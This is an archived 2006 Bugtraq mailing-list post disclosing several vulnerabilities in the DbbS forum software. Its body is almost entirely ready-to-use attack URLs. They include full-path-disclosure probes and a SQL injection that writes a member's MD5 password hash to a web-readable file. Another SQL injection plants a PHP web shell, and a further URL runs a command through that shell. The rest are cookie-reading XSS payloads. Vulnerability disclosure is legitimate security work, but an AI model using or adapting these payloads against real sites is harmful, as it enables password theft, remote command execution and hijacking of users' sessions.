lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060416034638.1791.qmail@securityfocus.com> Date: 16 Apr 2006 03:46:38 -0000 From: yamcho@...l.it To: bugtraq@...urityfocus.com Subject: DbbS<=2.0-alpha Multiple Vulnerabilities Special thanks to rgod for his help!!! Full path disclosure http://www.site.com/DbbS/topics.php?fcategoryid=' http://www.site.com/DbbS/script.php?unavariabile[]= http://www.site.com/DbbS/script.php?GLOBALS[]= http://www.site.com/DbbS/script.php?_SERVER[]= MD5 Password http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/* Create shell http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,'<?php%20passthru($_GET[cmd]);?>'%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/* Launch a command http://www.site.com/DbbS/suntzu.php?cmd=dir XSS http://www.site.com/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script> http://www.site.com/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script> by rgod and yamcho